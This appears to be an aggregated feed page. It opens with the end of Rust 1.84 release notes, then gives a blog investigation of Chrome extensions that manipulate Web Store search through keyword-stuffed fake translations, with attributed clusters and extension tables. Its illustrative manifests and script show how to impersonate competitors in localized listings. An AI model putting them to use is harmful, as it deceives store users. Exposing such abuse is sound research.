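// error[E0119]: conflicting implementations of trait `Pretty` for type `Vec<u32>`
impl Pretty for Vec<u32> {
    fn pretty(&self) -> String {
        String::from("a vector of numbers")
    }
}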

This stabilization fixes a few mostly theoretical correctness issues of the old implementation, resulting in potential "conflicting implementations of trait ..." errors that were not previously reported. We expect the affected patterns to be very rare based on evaluation of available code through Crater. The stabilization also improves our ability to prove that impls do not overlap, allowing more code to be written in some cases.

For more details, see a previous blog post and the stabilization report.

Strict provenance APIs

In Rust, pointers are not simply an "integer" or "address". For instance, a "use after free" is undefined behavior even if you "get lucky" and the freed memory gets reallocated before your read/write. As another example, writing through a pointer derived from an &i32 reference is undefined behavior, even if writing to the same address via a different pointer is legal. The underlying pattern here is that the way a pointer is computed matters, not just the address that results from this computation. For this reason, we say that pointers have provenance: to fully characterize pointer-related undefined behavior in Rust, we have to know not only the address the pointer points to, but also track which other pointer(s) it is "derived from".

Most of the time, programmers do not need to worry much about provenance, and it is very clear how a pointer got derived. However, when casting pointers to integers and back, the provenance of the resulting pointer is underspecified. With this release, Rust is adding a set of APIs that can in many cases replace the use of integer-pointer-casts, and therefore avoid the ambiguities inherent to such casts. In particular, the pattern of using the lowest bits of an aligned pointer to store extra information can now be implemented without ever casting a pointer to an integer or back. This makes the code easier to reason about, easier to analyze for the compiler, and also benefits tools like Miri and architectures like CHERI that aim to detect and diagnose pointer misuse.
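As a small example of what this enables, here is the tagged-pointer pattern mentioned above written with the newly stable APIs (a minimal sketch; it relies on a 4-byte-aligned u32 so the lowest bit is free):

fn main() {
    let mut value: u32 = 42;
    let ptr: *mut u32 = &mut value;

    // Stash a flag in the lowest bit; u32 alignment guarantees it is zero.
    let tagged = ptr.map_addr(|addr| addr | 0b1);

    // Inspect the tag without ever casting the pointer to an integer.
    assert_eq!(tagged.addr() & 0b1, 1);

    // Clear the tag before dereferencing; provenance is preserved throughout.
    let untagged = tagged.map_addr(|addr| addr & !0b1);
    assert_eq!(unsafe { *untagged }, 42);
}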

For more details, see the standard library documentation on provenance.

Stabilized APIs

These APIs are now stable in const contexts

Other changes

Check out everything that changed in Rust, Cargo, and Clippy.

Contributors to 1.84.0

Many people came together to create Rust 1.84.0. We couldn't have done it without all of you. Thanks!

Wladimir PalantHow extensions trick CWS search

A few months ago I searched for “Norton Password Manager” in Chrome Web Store and got lots of seemingly unrelated results. Not just that, the actual Norton Password Manager was listed last. These search results are still essentially the same today, only that Norton Password Manager moved to the top of the list:

Screenshot of Chrome Web Store search results listing six extensions. While Norton Password Manager is at the top, the remaining search results like “Vytal - Spoof Timezone, Geolocation & Locale”, “Free VPN - 1VPN” or “Charm - Coupons, Promo Codes, & Discounts” appear completely unrelated. All extensions are marked as featured.

I was stumped how Google managed to mess up search results so badly and even posted the following on Mastodon:

Interesting. When I search for “Norton Password Manager” on Chrome Web Store, it first lists five completely unrelated extensions, and only the last search result is the actual Norton Password Manager. Somebody told me that website is run by a company specializing in search, so this shouldn’t be due to incompetence, right? What is it then?

Somebody suggested that the extensions somehow managed to pay Google for this placement which seems… well, rather unlikely. For reasons, I came back to this a few weeks ago and decided to take a closer look at the extensions displayed there. These seemed shady, with at least three results being former open source extensions (as in: still claiming to be open source, but the linked code repository didn’t contain the current state).

And then I somehow happened to see what it looks like when I change Chrome Web Store language:

Screenshot of Chrome Web Store search results listing the same six extensions. The change in language is visible because the “Featured” badge is now called something else. All extension descriptions are still English however, but they are different. 1VPN calls itself “Browsec vpn urban vpn touch tunnelbear vpn 1click vpn 1clickvpn - 1VPN” and Vytal calls itself “Vytal - Works With 1click VPN & Hotspot VPN”.

Now I don’t claim to know Swahili but what happened here clearly wasn’t translating.

The trick

Google Chrome is currently available in 55 languages. Browser extensions can choose to support any subset of these languages, even though most of them support exactly one. Not only can the extension’s user interface be translated; its name and short description can be made available in multiple languages as well. Chrome Web Store considers such translations according to the user’s selected language. Chrome Web Store also has an extensive description field which isn’t contained within the extension but can be translated.

Apparently, some extension authors figured out that the Chrome Web Store search index is shared across all languages. If you wanted to show up in the search when people look for your competitors for example, you could add their names to your extension’s description – but that might come across as spammy. So what you do instead is sacrificing some of the “less popular” languages and stuff the descriptions there full of relevant keywords. And then your extension starts showing up for these keywords even when they are entered in the English version of the Chrome Web Store. After all, who cares about Swahili other than maybe five million native speakers?
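To make the mechanism concrete, here is a hypothetical listing (invented names and keywords) of how such an extension’s localized name files might look:

// manifest.json – the displayed name is resolved per user language
{ "name": "__MSG_extName__", "default_locale": "en" }

// _locales/en/messages.json – what English-speaking users see
{ "extName": { "message": "Coupon Finder" } }

// _locales/sw/messages.json – a “sacrificed” locale stuffed with keywords
{ "extName": { "message": "Coupon Finder - norton password manager vpn adblock" } }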

I’ve been maintaining a GitHub repository with Chrome extension manifests for a while, uploading new snapshots every now and then. Unfortunately, it only contained English names and descriptions. So now I’ve added a directory with localized descriptions for each extension. With that data, most of the issues became immediately obvious – even if you don’t know Swahili.

Screenshot of a JSON listing. The key name is sw indicating Swahili language. The corresponding description starts with “Charm is a lightweight, privacy friendly coupon finder.” Later on it contains a sequence of newlines, followed by a wall of text along the lines of: “GMass: Powerful mail merge for GMail Wikiwand - Wikipedia, and beyond Super dark mode Desktopify”

Update (2025-01-09): Apparently, Google has already been made aware of this issue a year ago at the latest. Your guess is as good as mine as to why it hasn’t been addressed yet.

Who is doing it?

Sifting through the suspicious descriptions and weeding out false positives brought up 920 extensions with bogus “translations” so far, and I definitely didn’t get all of them (see the extension lists). But that doesn’t actually mean hundreds of extension developers. I’ve quickly noticed patterns, somebody applying roughly the same strategy to a large cluster of extensions. For example, European developers tended to “sacrifice” some Asian languages like Bengali whereas developers originating in Asia preferred European languages like Estonian. These strategies were distinctly different from each other and there weren’t a whole lot of them, so there seems to be a relatively low number of parties involved. Some I could even put a name on.

Kodice LLC / Karbon Project LP / BroCode LTD

One such cluster of extensions has been featured on this blog in 2023 already. Back then I listed 108 of their extensions which was only a small sample of their operations. Out of that original sample, 96 extensions remain active in Chrome Web Store. And out of these, 81 extensions are abusing translations to improve their ranking in the extension search. From the look of it, all their developers are speaking Russian now – I guess they are no longer hiring in Ukraine. I’ve expanded on the original list a bit, but attribution is unfortunately too time consuming here. So it’s likely way more than the 122 extensions I now list for this cluster.

Back in 2023 some of these extensions were confirmed to spy on users, commit affiliate fraud or inject ads into web pages. The others seemed benign which most likely meant that they were accumulating users and would turn malicious later. But please don’t mention Kodice LLC, Karbon Project LP, BroCode LTD in the context of malicious extensions and Chrome Web Store spam, they don’t like that. In fact, they sent a bogus DMCA takedown notice in an attempt to remove my article from the search engines, claiming that it violates the copyright of the …checks notes… Hacker News page discussing that very article. So please don’t say that Kodice LLC, Karbon Project LP, BroCode LTD are spamming Chrome Web Store with their extensions which would inevitably turn on their users – they are definitely the good guys … sorry, good bros I mean.

PDF Toolbox cluster

Another extension cluster also appeared on this blog before. Back in 2023 an investigation that started with the PDF Toolbox extension brought up 34 malicious extensions. The extensions contained obfuscated code that was hijacking people’s searches and monetizing them by redirecting to Bing. Not that they were limited to it, they could potentially do way more damage.

Note: The PDF Toolbox extension is long gone from Chrome Web Store and unrelated to the extension with the same name available there now.

Google removed all the extensions I reported back then, but whoever is behind them kept busy of course. I found 107 extensions belonging to the same cluster; out of these, 100 extensions are on my list due to abusing translations to improve their ranking. I didn’t have the time to do an in-depth analysis of these extensions, but at least one (not on the list) is again doing search hijacking and not even hiding it. The few others I briefly looked at didn’t have any obvious malicious functionality – yet.

Unfortunately, I haven’t come across many clues towards who is behind these extensions. There is a slight indication that these extensions might be related to the BroCode cluster, but that’s far from certain given the significant differences between the two. One thing is certain however: you shouldn’t believe their user numbers; these have clearly been inflated artificially.

ZingFront Software / ZingDeck / BigMData

There is one more huge extensions cluster that I investigated in 2023. Back then I gave up without publishing my findings, in part due to Google’s apparent lack of interest in fighting spam in their add-on store. Lots of websites, lots of fake personas and supposed companies that don’t actually exist, occasionally even business addresses that don’t exist in the real world. There are names like LinkedRadar, FindNiche or SellerCenter, and they aren’t spamming only Chrome Web Store but also mobile app stores and search engines for example. This is clearly a big operation, but initially all I could really tell was that this was the work of people speaking Chinese. Was this a bunch of AI enthusiasts looking to make a quick buck and exchanging ideas?

In hindsight it took me too long to realize that many of the websites run on ZingFront infrastructure and ZingFront employees are apparently involved. Then things started falling into place, with the clues being so obvious: I found BigMData International PTE. LTD. linked to some of the extensions, and ZingDeck Intl LTD. responsible for some of the others. Both companies are located at the same address in Singapore and obviously related. And both appear to be subsidiaries of ZingFront Software, an AI startup in Beijing. ZingDeck claims to have 120 employees, which is quite sufficient to flood Chrome Web Store with hundreds of extensions. Being funded by Baidu Ventures certainly helps as well.

Altogether I could attribute 223 extensions on my list to this cluster. For this article I could not really inspect the functionality of these extensions, but it seems that they are being monetized by selling subscriptions to premium functionality. Same seems to be true for the numerous other offers pushed out by these companies.

I asked ZingFront Software for a comment but haven’t heard back from them so far.

ExtensionsBox, Lazytech, Yue Apps, Chrome Extension Hub, Infwiz, NioMaker

The extension clusters ExtensionsBox, Lazytech, Yue Apps, Chrome Extension Hub, Infwiz and NioMaker produce very similar extensions and all seem to be run by Chinese-speaking developers. Some of those might actually be one cluster, or they might all be subdivisions of ZingDeck. Quite frankly, I didn’t want to waste even more time figuring out who is working together and who is competing, so I listed them all separately.

Free Business Apps

This is a large cluster which I haven’t noticed before. It has hundreds of extensions connected to websites like Free Business Apps, PDFWork, DLLPlayer and many more. It contributed “merely” 55 extensions to my list however, because the developers of these extensions generally prefer to avoid awkward situations due to mismatched translations. So instead they force the desired (English) keywords into all translations of the extension’s description. This approach likely aims at messing up general search engines, not merely Chrome Web Store search. As it is out of scope for this article, only the relatively rare exceptions made my list here.

It isn’t clear who is behind this cluster of extensions. On the one edge of this cluster I found the Ukraine-based Blife LLC, yet their official extensions aren’t linked to the cluster. I asked the company for comment and got a confirmation of what I’ve already suspected after looking at a bunch of court decisions: a previous developer and co-owner left the company, taking some of the assets with him. He now seems to be involved with at least some of the people running this cluster of extensions.

The other edge of the cluster doesn’t seem to be speaking Russian or Ukrainian however, there are instead weak indications that Farsi-speakers are involved. Here I found the Teheran-based Xino Digital, developing some extensions with weak connections to this cluster. While Xino Digital specializes in “Digital Marketing” and “SEO & Organic Traffic,” they seem to lack the resources for this kind of operation. I asked Xino Digital for a comment but haven’t heard back so far.

The approaches

While all extensions listed use translations to mess with Chrome Web Store search, a number of different approaches can be distinguished. Most extensions combine a few of the approaches listed below. Some extension clusters use the same approaches consistently, others vary theirs. I’ve linked to the applying approaches from the extension list.

1. Different extension name

This approach is very popular, likely because Chrome Web Store search weights the extension name more heavily than its descriptions. Many extensions therefore use slight variations of their original name depending on the language. Some even go as far as using completely different names, occasionally entirely unrelated to the extension’s purpose – all to show up prominently in searches.
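
For readers wondering how an extension even ships different names per language: when the manifest references localized strings, the name and short description shown in the store follow the extension’s own locale files. The sketch below is a hypothetical extension with invented names, generated via a small Python script for brevity; it also covers approach 2, since the short description uses the same mechanism.

```python
import json
import pathlib

# Hypothetical extension: the manifest pulls name and short description from
# the locale files, so nothing stops each "translation" from shipping an
# entirely different name (approach 1) or description (approach 2).
manifest = {
    "manifest_version": 3,
    "version": "1.0",
    "default_locale": "en",
    "name": "__MSG_extName__",         # resolved per-locale by Chrome
    "description": "__MSG_extDesc__",  # short description, same mechanism
}

locales = {
    # English users see an innocuous listing...
    "en": {
        "extName": {"message": "Colorful Cursors"},
        "extDesc": {"message": "Pretty cursors for your browser."},
    },
    # ...while the (invented) Bengali "translation" hijacks a competitor's
    # name and stuffs unrelated keywords into the short description.
    "bn": {
        "extName": {"message": "Google Translate"},
        "extDesc": {"message": "translator, adblock, vpn, screenshot"},
    },
}

pathlib.Path("manifest.json").write_text(json.dumps(manifest, indent=2))
for lang, messages in locales.items():
    directory = pathlib.Path("_locales") / lang
    directory.mkdir(parents=True, exist_ok=True)
    (directory / "messages.json").write_text(
        json.dumps(messages, ensure_ascii=False, indent=2))
```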

2. Different short description

Similarly, some extensions contain different variants of their short description for various languages. These variants typically don’t differ much and merely serve to match a handful of related search keywords. A few extensions, however, replaced their short description in some languages with a plain list of keywords.

3. Using competitors’ names

In some cases I noticed extensions using the names of their competitors or other related products. Some would go as far as “renaming” themselves into a competing product in some languages. In other cases the approach is less obvious, e.g. when extension descriptions provide lists of “alternatives” or “compatible extensions.” I haven’t flagged this approach consistently, simply because I don’t always know who the competitors are.

4. Considerably more extensive extension description

Some extensions have a relatively short and concise English description, yet the “translation” into some other languages is a massive wall of text, often making little sense. Sometimes a proper translation is present but “extended” with a lengthy English passage; in other cases only English text is present. Either way, the added text seems to exist only to place a bunch of keywords.

Note that translation management in Chrome Web Store is quite messy, so multiple variants of the English translation aren’t necessarily a red flag – these might have simply been forgotten. Consequently, I tried to err in favor of extension authors when flagging this approach.
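
Flagging this pattern lends itself to automation. Below is a minimal illustrative heuristic, not the exact method used for this article: it flags languages whose “translation” is several times longer than the English original, with the 3x threshold being an arbitrary assumption.

```python
# Hypothetical heuristic: flag listings whose "translated" description is
# vastly longer than the English original (approach 4).
def flag_inflated_translations(descriptions: dict[str, str],
                               ratio_threshold: float = 3.0) -> list[str]:
    """descriptions maps language code -> detailed description text."""
    base = len(descriptions.get("en", ""))
    if base == 0:
        return []
    return [lang for lang, text in descriptions.items()
            if lang != "en" and len(text) / base >= ratio_threshold]

# Example: a short English blurb with a keyword-stuffed "German" wall of text.
print(flag_inflated_translations({"en": "A simple paint tool.",
                                  "de": "paint draw editor " * 40}))  # ['de']
```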

5. Keywords at the end of extension description

A very popular approach is taking a translation (or the untranslated English description) and adding a long list of keywords and keyphrases to its end in some languages. Often this block is visually separated by a number of empty lines, making sure that people actually reading the description in that language aren’t too confused.
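
That visual separation makes the pattern fairly easy to detect mechanically. The following sketch is again only an illustrative heuristic with arbitrary thresholds, not the method used for this article: it flags descriptions ending in a block that is set off by empty lines and consists almost entirely of short, comma-separated phrases.

```python
import re

# Hypothetical heuristic for approach 5: a trailing block, separated by
# several blank lines and made up of many short phrases without sentence
# punctuation, is likely a keyword dump.
def has_trailing_keyword_block(description: str) -> bool:
    parts = re.split(r"\n{3,}", description.strip())
    if len(parts) < 2:
        return False
    tail = parts[-1]
    phrases = [p.strip() for p in re.split(r"[,\n]", tail) if p.strip()]
    return (len(phrases) >= 5
            and sum(len(p.split()) <= 4 for p in phrases) / len(phrases) > 0.8
            and tail.count(".") == 0)

text = ("A simple paint tool.\n\n\n\n"
        "paint, draw, editor, screenshot, color picker, eyedropper")
print(has_trailing_keyword_block(text))  # True
```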

6. Keywords within the extension description

A stealthier approach is hiding the keywords within the extension description. Some extensions use slight variations of the same text, differing only in one or two keywords. Others use automated translations of their descriptions but sprinkle a bunch of (typically English) keywords into them. Occasionally a translation is broken up by a long list of unrelated keywords.

7. Different extension description

In a few cases the extension description just looked like completely unrelated text. Sometimes it seemed to be copied from a competing extension’s description, other times it made no sense whatsoever.

And what should Google do about it?

The Chrome Web Store policy on spam and abuse is quite clear here:

Developers must not attempt to manipulate the placement of any extensions in the Chrome Web Store.

So Google can and should push back on this kind of manipulation. At the very least, Google might dislike the fact that there are currently no fewer than eleven extensions named “Google Translate” – in some languages, that is. In fact, per the same policy Google isn’t even supposed to tolerate spam in Chrome Web Store:

We don’t allow any developer, related developer accounts, or their affiliates to submit multiple extensions that provide duplicate experiences or functionality on the Chrome Web Store.

Unfortunately, Google hasn’t been very keen on enforcing this policy in the past.

There is also a possible technical solution here. By making the Chrome Web Store search index per-language, Google could remove the incentive for this kind of manipulation: if Bengali listings no longer show up in English-language searches, there is no point in messing up the Bengali translation any more. Of course, searching across languages is a feature – but a feature isn’t worth keeping if Google cannot contain the abuse by other means.
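
To make the idea concrete, here is a toy sketch of such a per-language index. This is an assumption about how it could work, not a description of Google’s actual search infrastructure: each translation is only indexed under its own language, so stuffed keywords stop leaking into other languages’ results.

```python
from collections import defaultdict

# Toy per-language inverted index: language -> word -> extension IDs.
index: dict[str, dict[str, set[str]]] = defaultdict(lambda: defaultdict(set))

def add_listing(ext_id: str, lang: str, text: str) -> None:
    # Index each translation only under its own language.
    for word in text.lower().split():
        index[lang][word].add(ext_id)

def search(query: str, lang: str) -> set[str]:
    # Only consult the index for the searcher's language.
    words = query.lower().split()
    results = [index[lang].get(w, set()) for w in words]
    return set.intersection(*results) if results else set()

add_listing("abc123", "en", "simple paint tool")
add_listing("abc123", "bn", "adblock vpn translator paint")  # stuffed "translation"
print(search("adblock", "en"))  # set(): stuffing only affects Bengali results
print(search("adblock", "bn"))  # {'abc123'}
```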

Quite frankly, however, I feel that Google should go beyond basic containment. The BroCode and PDF Toolbox clusters are known to produce malicious extensions. These need to be monitored proactively, and the same kind of attention might be worth extending to the other extension clusters as well.

The extensions in question

One thing up front: Chrome Web Store is messy. There are copycats, pretenders and scammers, so attribution isn’t always a straightforward affair, and occasionally an extension might be attributed to a cluster it doesn’t belong to. It’s far more common, however, for an extension not to be sorted into its cluster at all, simply because the evidence linking it there isn’t strong enough and I only had limited time to investigate.

The user counts listed reflect the state on December 13, 2024.

Kodice / Karbon Project / BroCode

Name Weekly active users Extension ID Approaches
What Font - find font & color 125 abefllafeffhoiadldggcalfgbofohfa 1, 2, 4
Video downloader web 1,000,000 acmbnbijebmjfmihfinfipebhcmgbghi 1, 2, 4
Picture in Picture - Floating player 700,000 adnielbhikcbmegcfampbclagcacboff 1, 2, 4
Floating Video Player Sound Booster 600,000 aeilijiaejfdnbagnpannhdoaljpkbhe 1, 2, 4
Sidebarr - ChatGPT, bookmarks, apps and more 100,000 afdfpkhbdpioonfeknablodaejkklbdn 1, 2, 5
Adblock for Youtube™ - Auto Skip ad 8,000 anceggghekdpfkjihcojnlijcocgmaoo 1, 2
Cute Cursors - Custom Cursor for Chrome™ 1,000,000 anflghppebdhjipndogapfagemgnlblh 4
Adblock for Youtube - skip ads 800,000 annjejmdobkjaneeafkbpipgohafpcom 1, 2, 3, 4
Translator, Dictionary - Accurate Translate 800,000 bebmphofpgkhclocdbgomhnjcpelbenh 1, 2, 3, 4
Screen Capture, Screenshot, Annotations 500,000 bmkgbgkneealfabgnjfeljaiegpginpl 1, 2
Sweet VPN 100,000 bojaonpikbbgeijomodbogeiebkckkoi 1, 2
Sound Booster - Volume Control 3,000,000 ccjlpblmgkncnnimcmbanbnhbggdpkie 1, 2, 4, 6
Web Client for Instagram™ - Sidegram 200,000 cfegchignldpfnjpodhcklmgleaoanhi 1, 2
Paint Tool for Chrome 200,000 coabfkgengacobjpmdlmmihhhfnhbjdm 1, 2, 4
History & Cache Cleaner - Smart Clean 2,000 dhaamkgjpilakclbgpabiacmndmhhnop 1, 2
Screenshot & Screen Video Record by Screeny 2,000,000 djekgpcemgcnfkjldcclcpcjhemofcib 1, 2, 4
Video Downloader for U 3,000,000 dkbccihpiccbcheieabdbjikohfdfaje 4
Multi Chat - Messenger for WhatsApp 2,000,000 dllplfhjknghhdneiblmkolbjappecbe 1, 2, 3, 7
Night Shift Mode 200,000 dlpimjmonhbmamocpboifndnnakgknbf 1, 2, 4
Music Downloader - VKsaver 500,000 dmbjkidogjmmlejdmnecpmfapdmidfjg 1, 2, 4
Daily Tab - New tab with ChatGPT 1,000 dnbcklfggddbmmnkobgedggnacjoagde 1, 2, 4
Web Color Picker - online color grabber 1,000,000 dneifdhdmnmmlobjbimlkcnhkbidmlek 1, 3, 4
Paint - Drawings Easy 300,000 doiiaejbgndnnnomcdhefcbfnbbjfbib 1, 2, 4, 6
Block Site - Site Blocker & Focus Mode 2,000,000 dpfofggmkhdbfcciajfdphofclabnogo 1, 2, 3, 4
2048 Online Classic game 200,000 eabhkjojehdleajkbigffmpnaelncapp 1, 2
Gmail Notifier - gmail notification tool 100,000 ealojglnbikknifbgleaceopepceakfn 6
Volume Recorder Online 1,000,000 ebdbcfomjliacpblnioignhfhjeajpch 1, 2, 4, 6
Volume Booster - Sound & Bass boost 1,000,000 ebpckmjdefimgaenaebngljijofojncm 1, 2, 4, 6
Screenshot Tool - Screen Capture & Editor 1,000,000 edlifbnjlicfpckhgjhflgkeeibhhcii 1, 2, 4, 6
Tabrr Dashboard - New Tab with ChatGPT 300,000 ehmneimbopigfgchjglgngamiccjkijh 6
New Tab for Google Workspace™ 200,000 ehpgcagmhpndkmglombjndkdmggkgnge 1, 4, 5
Equalizer - Bass Booster Master 200,000 ejigejogobkbkmkgjpfiodlmgibfaoek 1, 2, 4, 6
Paint 300,000 ejllkedmklophclpgonojjkaliafeilj 1, 4
Online messengers in All-in-One chat 200,000 ekjogkoigkhbgdgpolejnjfmhdcgaoof 2, 4, 6
Ultimate Video Downloader 700,000 elpdbicokgbedckgblmbhoamophfbchi 2
Translate for Chrome -Translator, Dictionary 500,000 elpmkbbdldhoiggkjfpgibmjioncklbn 1, 2, 3
Color Picker, Eyedropper - Geco colorpick 2,000,000 eokjikchkppnkdipbiggnmlkahcdkikp 1, 2, 3, 4, 6
Dark Mode for Chrome 1,000,000 epbpdmalnhhoggbcckpffgacohbmpapb 1, 2, 4
VPN Ultimate - Best VPN by unblock 400,000 epeigjgefhajkiiallmfblgglmdbhfab 1, 2, 4
Flash Player Enabler 300,000 eplfglplnlljjpeiccbgnijecmkeimed 1, 2
ChitChat - Search with ChatGPT 2,000,000 fbbjijdngocdplimineplmdllhjkaece 1, 2, 3, 4
Simple Volume Booster 1,000,000 fbjhgeaafhlbjiejehpjdnghinlcceak 1, 2, 4, 6
Free VPN for Chrome - VPN Proxy 1click VPN 8,000,000 fcfhplploccackoneaefokcmbjfbkenj 1, 2
InSaverify - Web for Instagram™ 800,000 fobaamfiblkoobhjpiigemmdegbmpohd 1, 2, 4, 6
ChatGPT Assistant - GPT Search 900,000 gadbpecoinogdkljjbjffmiijpebooce 1, 2, 4, 6
Adblock all advertisement - No Ads extension 700,000 gbdjcgalliefpinpmggefbloehmmknca 1, 2, 3, 4
Web Sound Equalizer 700,000 gceehiicnbpehbbdaloolaanlnddailm 1, 2, 4, 6
Screenshot Master: Full Page Capture 700,000 ggacghlcchiiejclfdajbpkbjfgjhfol 1, 2, 4
Dark Theme - Dark mode for Chrome 900,000 gjjbmfigjpgnehjioicaalopaikcnheo 1, 2, 4
Cute Tab - Custom Dashboard 60,000 gkdefhnhldnmfnajfkeldcaihahkhhnd 1
Quick Translate: Reading & writing translator 100,000 gpdfpljioapjogbnlpmganakfjcemifk 1, 2, 4
HD Video Downloader 800,000 hjlekdknhjogancdagnndeenmobeofgm 1, 2
Web Translate - Online translator 1,000,000 hnfabcchmopgohnhkcojhocneefbnffg 1, 2, 3, 4, 6
QR Code Generator 300,000 hoeiookpkijlnjdafhaclpdbfflelmci 1, 2, 4
2048 Game 1,000,000 iabflonngmpkalkpbjonemaamlgdghea 4
Translator 100,000 icchadngbpkcegnabnabhkjkfkfflmpj 4, 6
Multilanguage Translator 1,000,000 ielooaepfhfcnmihgnabkldnpddnnldl 1, 2, 3, 4, 6
FocusGuard - Block Site & Focus Mode 400,000 ifdepgnnjpnbkcgempionjablajancjc 1, 2, 3, 7
Scrnli - Screen Recorder & Screen Capture App 1,000,000 ijejnggjjphlenbhmjhhgcdpehhacaal 1, 2, 4
Web Paint Tool - draw online 600,000 iklgljbighkgbjoecoddejooldolenbj 1, 2, 4, 5
Screen Recorder and Screenshot Tool 1,000,000 imopknpgdihifjkjpmjaagcagkefddnb 1, 2, 4
Free VPN Chrome extension - Best VPN by uVPN 1,000,000 jaoafpkngncfpfggjefnekilbkcpjdgp 1, 2, 7
Video Downloader Social 1,000,000 jbmbplbpgcpooepakloahbjjcpfoegji 1, 2, 4
Color Picker Online - Eyedropper Tool 189 jbnefeeccnjmnceegehljhjonmlbkaji 1, 2
Volume Booster, equalizer → Audio control 1,000,000 jchmabokofdoabocpiicjljelmackhho 1, 4
PDF Viewer 1,000,000 jdlkkmamiaikhfampledjnhhkbeifokk 1, 2, 4
Adblock Web - Adblocker for Chrome 300,000 jhkhlgaomejplkanglolfpcmfknnomle 1, 2, 3
Adblock Unlimited - Adblocker 600,000 jiaopkfkampgnnkckajcbdgannoipcne 1, 2, 3, 4
Hide YouTube distraction - shorts block 1,000 jipbilmidhcobblmekbceanghkdinccc 1, 2, 3
ChatGPT for Chrome - GPT Search 700,000 jlbpahgopcmomkgegpbmopfodolajhbl 1, 2, 3
Adblock for YouTube™ 2,000,000 jpefmbpcbebpjpmelobfakahfdcgcmkl 1, 2, 3, 4
User Agent Switcher 100,000 kchfmpdcejfkipopnolndinkeoipnoia 1
Speed Test for Chrome - WiFi speedtest 400,000 khhnfdoljialnlomkdkphhdhngfppabl 1, 2, 4, 6
Video Downloader professional 400,000 knkpjhkhlfebmefnommmehegjgglnkdm 1, 2, 4
Quick Translate 700,000 kpcdbiholadphpbimkgckhggglklemib 1, 2, 4, 6
Tab Suspender 100,000 laameccjpleogmfhilmffpdbiibgbekf 1
Adblock for Youtube - ad blocker tool 800,000 lagdcjmbchphhndlbpfajelapcodekll 1, 2, 3, 4
PDF Viewer - open in PDF Reader 300,000 ldaohgblglnkmddflcccnfakholmaacl 1, 2, 4
Moment - #1 Personal Dashboard for Chrome 200,000 lgecddhfcfhlmllljooldkbbijdcnlpe 1
Screen Video Recorder & Screenshot 400,000 lhannfkhjdhmibllojbbdjdbpegidojj 1, 2
Dark Theme - Dark Reader for Web 1,000,000 ljjmnbjaapnggdiibfleeiaookhcodnl 1, 2, 4, 6
Auto Refresh Page - reload page 500,000 lkhdihmnnmnmpibnadlgjfmalbaoenem 1, 2, 4, 6
Flash Player for Web 800,000 lkhhagecaghfakddbncibijbjmgfhfdm 1, 2, 4, 6
INSSAVE - App for Instagram 100,000 lknpbgnookklokdjomiildnlalffjmma 1, 2, 4, 6
Simple Translator, Dictionary, TTS 1,000,000 lojpdfjjionbhgplcangflkalmiadhfi 1, 2, 3, 4, 6
Web paint tool - Drawww 60,000 mclgkicemmkpcooobfgcgocmcejnmgij 6
Adblock for Twitch 200,000 mdomkpjejpboocpojfikalapgholajdc 1, 2, 3, 4
Infinite Dashboard - New Tab like no other 200,000 meffljleomgifbbcffejnmhjagncfpbd 1, 2, 4
ChatGPT Assistant for Chrome - SidebarGPT 1,000,000 mejjgaogggabifjfjdbnobinfibaamla 1, 2
Volume Max - Ultimate Sound Booster 1,000,000 mgbhdehiapbjamfgekfpebmhmnmcmemg 1, 2, 4
Good Video Downloader 400,000 mhpcabliilgadobjpkameggapnpeppdg 4
Video Downloader Unlimited 1,000,000 mkjjckchdfhjbpckippbnipkdnlidbeb 1, 2, 4
ChatGPT for Google: Search GPT 500,000 mlkjjjmhjijlmafgjlpkiobpdocdbncj 1, 2, 4, 6
Translate - Translator, Dictionary, TTS 1,000,000 mnlohknjofogcljbcknkakphddjpijak 1, 2, 3, 4, 5
Web Paint - Page Marker & Editor 400,000 mnopmeepcnldaopgndiielmfoblaennk 1, 2, 4, 6
Auto Refresh & Page Monitor 1,000,000 nagebjgefhenmjbjhjmdifchbnbmjgpa 1, 2, 4
VPN Surf - Fast VPN by unblock 800,000 nhnfcgpcbfclhfafjlooihdfghaeinfc 1, 2, 4
SearchGPT - ChatGPT for Chrome 2,000,000 ninecedhhpccjifamhafbdelibdjibgd 1, 2
Video Speed Controller for HTML videos 400,000 nkkhljadiejecbgelalchmjncoilpnlk 1, 2, 4, 6
Flash Player that Works! 300,000 nlfaobjnjbmbdnoeiijojjmeihbheegn 1, 2, 4, 6
Sound Booster - increase volume up 1,000,000 nmigaijibiabddkkmjhlehchpmgbokfj 1, 2, 4, 6
Voice Reader: Read Aloud Text to Speech (TTS) 500,000 npdkkcjlmhcnnaoobfdjndibfkkhhdfn 1, 2, 4, 5
uTab - Unlimited Custom Dashboard 200,000 npmjjkphdlmbeidbdbfefgedondknlaf 1, 4, 6
Flash Player for Chrome 600,000 oakbcaafbicdddpdlhbchhpblmhefngh 1, 2
Paint Tool by Painty 400,000 obdhcplpbliifflekgclobogbdliddjd 1, 2
Night Shift 200,000 ocginjipilabheemhfbedijlhajbcabh 1, 2
Editor for Docs, Sheets & Slides 200,000 oepjogknopbbibcjcojmedaepolkghpb 1, 2, 6
Accept all cookies 300,000 ofpnikijgfhlmmjlpkfaifhhdonchhoi 1, 2, 3, 4
The Cleaner - delete Cookies and Cache 100,000 ogfjgagnmkiigilnoiabkbbajinanlbn 1, 2
Screenshot & Screen Recorder 1,000,000 okkffdhbfplmbjblhgapnchjinanmnij 1, 2, 4
Cute ColorBook - Coloring Book Online 9,000 onhcjmpaffbelbeeaajhplmhfmablenk 1
What Font - font finder 400,000 opogloaldjiplhogobhmghlgnlciebin 1, 2, 4
Translator - Select to Translate 1,000,000 pfoflbejajgbpkmllhogfpnekjiempip 1, 2, 3, 4, 6
Custom Cursors for Chrome 800,000 phfkifnjcmdcmljnnablahicoabkokbg 1, 2, 4
Color Picker - Eyedropper Tool 100,000 phillbeieoddghchonmfebjhclflpoaj 1, 2, 4, 6
Text mode for websites - ReadBee 500,000 phjbepamfhjgjdgmbhmfflhnlohldchb 1, 2, 4, 6
Dark Mode - Dark Reader for Сhrome 8,000,000 pjbgfifennfhnbkhoidkdchbflppjncb 1, 2, 4, 6
Sound Booster - Boost My Bass 900,000 plmlopfeeobajiecodiggabcihohcnge 1, 2, 4
Sound Booster 100,000 pmilcmjbofinpnbnpanpdadijibcgifc 1, 2, 4
Screen Capture - Screenshot Tool 700,000 pmnphobdokkajkpbkajlaiooipfcpgio 1, 4
Floating Video with Playback Controls 800,000 pnanegnllonoiklmmlegcaajoicfifcm 1, 2
Cleaner - history & cache clean 100,000 pooaemmkohlphkekccfajnbcokjlbehk 1, 2, 4, 6

PDF Toolbox cluster

Name Weekly active users Extension ID Approaches
Stick Ninja Game 3,000,000 aamepfadihoeifgmkoipamkenlfpjgcm 4
